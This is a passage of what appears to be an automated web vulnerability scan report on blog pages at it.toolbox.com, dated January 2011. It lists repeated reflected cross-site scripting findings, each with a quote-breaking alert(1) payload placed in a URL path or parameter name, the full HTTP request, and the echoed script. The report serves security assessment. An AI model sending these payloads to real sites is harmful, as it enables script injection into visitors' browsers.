<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Change Orig ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d39674%266adc7'-alert(1)-'c1d11b6e461%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f57ac'-alert(1)-'b6aa0518d05 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/f57ac'-alert(1)-'b6aa0518d05 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26f57ac'-alert(1)-'b6aa0518d05'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.50. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f05d3'-alert(1)-'3e9e700a587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066?f05d3'-alert(1)-'3e9e700a587=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67587
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Does John S ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42066%26f05d3'-alert(1)-'3e9e700a587%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7389a'-alert(1)-'c353bec37b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/7389a'-alert(1)-'c353bec37b3 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%267389a'-alert(1)-'c353bec37b3'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.52. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/ppmtoday/dx3-data-driven-decisions-41860
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89332'-alert(1)-'7884c23ec6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/dx3-data-driven-decisions-41860?89332'-alert(1)-'7884c23ec6a=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73313
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Dx3: Data D ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d41860%2689332'-alert(1)-'7884c23ec6a%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 153bd'-alert(1)-'8a6f1963125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/153bd'-alert(1)-'8a6f1963125 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:49 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26153bd'-alert(1)-'8a6f1963125'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.54. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/ppmtoday/elementary-school-and-saas-38160
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7181'-alert(1)-'56eb5abc328 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/elementary-school-and-saas-38160?b7181'-alert(1)-'56eb5abc328=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70424
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Elementary ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38160%26b7181'-alert(1)-'56eb5abc328%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4612'-alert(1)-'0963bd1ab64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/e4612'-alert(1)-'0963bd1ab64 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63834
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26e4612'-alert(1)-'0963bd1ab64'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.56. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/ppmtoday/it-starts-with-data-40018
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58a79'-alert(1)-'14647d4667a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/it-starts-with-data-40018?58a79'-alert(1)-'14647d4667a=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73100
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:37 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> It Starts W ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40018%2658a79'-alert(1)-'14647d4667a%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 994fe'-alert(1)-'a2173915a6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/994fe'-alert(1)-'a2173915a6a HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26994fe'-alert(1)-'a2173915a6a'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.58. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f41c0'-alert(1)-'48b85824530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168?f41c0'-alert(1)-'48b85824530=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72848
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Key Success ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42168%26f41c0'-alert(1)-'48b85824530%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9924'-alert(1)-'aace0a2e612 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/b9924'-alert(1)-'aace0a2e612 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26b9924'-alert(1)-'aace0a2e612'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.60. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/ppmtoday/life-cycles-40815
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60204'-alert(1)-'ba784fcf1d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/life-cycles-40815?60204'-alert(1)-'ba784fcf1d3=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68422
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Life Cycles ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40815%2660204'-alert(1)-'ba784fcf1d3%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2d'-alert(1)-'86aa45cbdf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/a4b2d'-alert(1)-'86aa45cbdf4 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26a4b2d'-alert(1)-'86aa45cbdf4'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.62. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/ppmtoday/making-the-case-43129
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c45be'-alert(1)-'37141b736fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/making-the-case-43129?c45be'-alert(1)-'37141b736fd=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74108
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:27 GMT
Connection: close
